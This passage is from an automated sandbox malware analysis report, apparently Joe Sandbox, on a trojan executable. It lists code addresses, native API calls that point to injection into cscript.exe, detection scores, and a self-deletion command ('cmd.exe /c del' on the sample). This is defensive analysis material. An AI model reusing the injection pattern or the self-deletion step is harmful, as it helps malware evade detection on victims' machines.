          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041BB461_2_0041BB46
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041CBF51_2_0041CBF5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00408C3A1_2_00408C3A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00408C801_2_00408C80
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041C48C1_2_0041C48C
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041BDD01_2_0041BDD0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041CF881_2_0041CF88
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A01_2_00B320A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD20A81_2_00BD20A8
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1B0901_2_00B1B090
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD28EC1_2_00BD28EC
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BDE8241_2_00BDE824
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC10021_2_00BC1002
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B241201_2_00B24120
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B0F9001_2_00B0F900
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD22AE1_2_00BD22AE
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3EBB01_2_00B3EBB0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BC03DA1_2_00BC03DA
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCDBD21_2_00BCDBD2
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD2B281_2_00BD2B28
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1841F1_2_00B1841F
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCD4661_2_00BCD466
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B325811_2_00B32581
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1D5E01_2_00B1D5E0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD25DD1_2_00BD25DD
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B00D201_2_00B00D20
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD2D071_2_00BD2D07
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD1D551_2_00BD1D55
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD2EF71_2_00BD2EF7
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B26E301_2_00B26E30
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BCD6161_2_00BCD616
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD1FF11_2_00BD1FF1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BDDFCE1_2_00BDDFCE
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004011751_1_00401175
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041C9971_1_0041C997
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041BB461_1_0041BB46
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041CBF51_1_0041CBF5
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00408C3A1_1_00408C3A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00408C801_1_00408C80
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041C48C1_1_0041C48C
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041BDD01_1_0041BDD0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00402D901_1_00402D90
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041CF881_1_0041CF88
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00402FB01_1_00402FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E1D556_2_054E1D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E2D076_2_054E2D07
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05410D206_2_05410D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E25DD6_2_054E25DD
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542D5E06_2_0542D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054425816_2_05442581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DD4666_2_054DD466
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542841F6_2_0542841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054EDFCE6_2_054EDFCE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E1FF16_2_054E1FF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DD6166_2_054DD616
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05436E306_2_05436E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E2EF76_2_054E2EF7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541F9006_2_0541F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054341206_2_05434120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054399BF6_2_054399BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D10026_2_054D1002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054EE8246_2_054EE824
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543A8306_2_0543A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E28EC6_2_054E28EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542B0906_2_0542B090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054420A06_2_054420A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E20A86_2_054E20A8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AB406_2_0543AB40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E2B286_2_054E2B28
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D03DA6_2_054D03DA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DDBD26_2_054DDBD2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544EBB06_2_0544EBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054CFA2B6_2_054CFA2B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E22AE6_2_054E22AE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123C9976_2_0123C997
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123CBF56_2_0123CBF5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01222D906_2_01222D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01228C3A6_2_01228C3A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01228C806_2_01228C80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01222FB06_2_01222FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123CF886_2_0123CF88
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: String function: 0041A390 appears 38 times
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: String function: 0041A4C0 appears 38 times
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: String function: 00B0B150 appears 39 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0541B150 appears 66 times
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004185E0 NtCreateFile,1_2_004185E0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00418690 NtReadFile,1_2_00418690
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00418710 NtClose,1_2_00418710
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004187C0 NtAllocateVirtualMemory,1_2_004187C0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004185DA NtCreateFile,1_2_004185DA
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B498F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00B498F0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00B49860
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49840 NtDelayExecution,LdrInitializeThunk,1_2_00B49840
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B499A0 NtCreateSection,LdrInitializeThunk,1_2_00B499A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00B49910
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A20 NtResumeThread,LdrInitializeThunk,1_2_00B49A20
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00B49A00
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A50 NtCreateFile,LdrInitializeThunk,1_2_00B49A50
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B495D0 NtClose,LdrInitializeThunk,1_2_00B495D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49540 NtReadFile,LdrInitializeThunk,1_2_00B49540
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B496E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00B496E0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00B49660
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B497A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00B497A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49780 NtMapViewOfSection,LdrInitializeThunk,1_2_00B49780
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49FE0 NtCreateMutant,LdrInitializeThunk,1_2_00B49FE0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49710 NtQueryInformationToken,LdrInitializeThunk,1_2_00B49710
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B498A0 NtWriteVirtualMemory,1_2_00B498A0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49820 NtEnumerateKey,1_2_00B49820
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4B040 NtSuspendThread,1_2_00B4B040
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B499D0 NtCreateProcessEx,1_2_00B499D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49950 NtQueueApcThread,1_2_00B49950
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A80 NtOpenDirectoryObject,1_2_00B49A80
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49A10 NtQuerySection,1_2_00B49A10
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4A3B0 NtGetContextThread,1_2_00B4A3B0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49B00 NtSetValueKey,1_2_00B49B00
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B495F0 NtQueryInformationFile,1_2_00B495F0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4AD30 NtSetContextThread,1_2_00B4AD30
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49520 NtWaitForSingleObject,1_2_00B49520
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49560 NtWriteFile,1_2_00B49560
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B496D0 NtCreateKey,1_2_00B496D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49610 NtEnumerateValueKey,1_2_00B49610
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49670 NtQueryInformationProcess,1_2_00B49670
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49650 NtQueryValueKey,1_2_00B49650
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49730 NtQueryVirtualMemory,1_2_00B49730
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4A710 NtOpenProcessToken,1_2_00B4A710
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49770 NtSetInformationFile,1_2_00B49770
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B4A770 NtOpenThread,1_2_00B4A770
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B49760 NtOpenProcess,1_2_00B49760
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004185E0 NtCreateFile,1_1_004185E0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00418690 NtReadFile,1_1_00418690
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00418710 NtClose,1_1_00418710
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004187C0 NtAllocateVirtualMemory,1_1_004187C0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004185DA NtCreateFile,1_1_004185DA
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459540 NtReadFile,LdrInitializeThunk,6_2_05459540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054595D0 NtClose,LdrInitializeThunk,6_2_054595D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459710 NtQueryInformationToken,LdrInitializeThunk,6_2_05459710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459FE0 NtCreateMutant,LdrInitializeThunk,6_2_05459FE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459780 NtMapViewOfSection,LdrInitializeThunk,6_2_05459780
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459650 NtQueryValueKey,LdrInitializeThunk,6_2_05459650
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_05459660
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054596D0 NtCreateKey,LdrInitializeThunk,6_2_054596D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054596E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_054596E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_05459910
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054599A0 NtCreateSection,LdrInitializeThunk,6_2_054599A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459840 NtDelayExecution,LdrInitializeThunk,6_2_05459840
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459860 NtQuerySystemInformation,LdrInitializeThunk,6_2_05459860
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A50 NtCreateFile,LdrInitializeThunk,6_2_05459A50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459560 NtWriteFile,6_2_05459560
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459520 NtWaitForSingleObject,6_2_05459520
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545AD30 NtSetContextThread,6_2_0545AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054595F0 NtQueryInformationFile,6_2_054595F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459760 NtOpenProcess,6_2_05459760
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545A770 NtOpenThread,6_2_0545A770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459770 NtSetInformationFile,6_2_05459770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545A710 NtOpenProcessToken,6_2_0545A710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459730 NtQueryVirtualMemory,6_2_05459730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054597A0 NtUnmapViewOfSection,6_2_054597A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459670 NtQueryInformationProcess,6_2_05459670
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459610 NtEnumerateValueKey,6_2_05459610
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459950 NtQueueApcThread,6_2_05459950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054599D0 NtCreateProcessEx,6_2_054599D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545B040 NtSuspendThread,6_2_0545B040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459820 NtEnumerateKey,6_2_05459820
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054598F0 NtReadVirtualMemory,6_2_054598F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054598A0 NtWriteVirtualMemory,6_2_054598A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459B00 NtSetValueKey,6_2_05459B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0545A3B0 NtGetContextThread,6_2_0545A3B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A00 NtProtectVirtualMemory,6_2_05459A00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A10 NtQuerySection,6_2_05459A10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A20 NtResumeThread,6_2_05459A20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05459A80 NtOpenDirectoryObject,6_2_05459A80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012385E0 NtCreateFile,6_2_012385E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01238710 NtClose,6_2_01238710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012387C0 NtAllocateVirtualMemory,6_2_012387C0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01238690 NtReadFile,6_2_01238690
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012385DA NtCreateFile,6_2_012385DA
          Source: Y1p8VPvyU2.exe, 00000000.00000003.302983969.0000000002D1F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000000.00000003.304611103.0000000002B86000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000001.00000002.362160211.0000000000D8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Y1p8VPvyU2.exe
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll 13FA843E8D2B2E3A9699F9F71A8AD152EA94995B1045891B6B91CFA9674B69F8
          Source: Y1p8VPvyU2.exeVirustotal: Detection: 35%
          Source: Y1p8VPvyU2.exeReversingLabs: Detection: 64%
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile read: C:\Users\user\Desktop\Y1p8VPvyU2.exeJump to behavior
          Source: Y1p8VPvyU2.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess created: C:\Users\user\Desktop\Y1p8VPvyU2.exe "C:\Users\user\Desktop\Y1p8VPvyU2.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile created: C:\Users\user\AppData\Local\Temp\nso1022.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@7/3
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,0_2_00402012
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040411B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2332:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: cscript.pdbUGP source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Y1p8VPvyU2.exe, 00000000.00000003.303889590.0000000002C00000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000000.00000003.304490729.0000000002A70000.00000004.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Y1p8VPvyU2.exe, Y1p8VPvyU2.exe, 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Y1p8VPvyU2.exe, 00000001.00000002.362000992.0000000000BFF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp
          Source: Binary string: cscript.pdb source: Y1p8VPvyU2.exe, 00000001.00000002.361796022.0000000000A60000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10023581 push eax; ret 0_2_100235B1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10023600 push eax; ret 0_2_100235B1
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10013245 push ecx; ret 0_2_10013258
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B822 push eax; ret 1_2_0041B828
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B82B push eax; ret 1_2_0041B892
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B88C push eax; ret 1_2_0041B892
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00415094 push ds; iretd 1_2_00415095
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041A269 push ebx; retf 1_2_0041A26B
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004044C6 push eax; retf 1_2_004044C7
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_0041B7D5 push eax; ret 1_2_0041B828
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B5D0D1 push ecx; ret 1_2_00B5D0E4
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B822 push eax; ret 1_1_0041B828
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B82B push eax; ret 1_1_0041B892
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B88C push eax; ret 1_1_0041B892
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_00415094 push ds; iretd 1_1_00415095
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041A269 push ebx; retf 1_1_0041A26B
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004044C6 push eax; retf 1_1_004044C7
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B7D5 push eax; ret 1_1_0041B828
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0546D0D1 push ecx; ret 6_2_0546D0E4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B822 push eax; ret 6_2_0123B828
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B82B push eax; ret 6_2_0123B892
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B88C push eax; ret 6_2_0123B892
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01235094 push ds; iretd 6_2_01235095
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123A269 push ebx; retf 6_2_0123A26B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012244C6 push eax; retf 6_2_012244C7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123C750 push es; iretd 6_2_0123C751
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B7D5 push eax; ret 6_2_0123B828
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405C49
          Source: Y1p8VPvyU2.exeStatic PE information: real checksum: 0x0 should be: 0x5d471
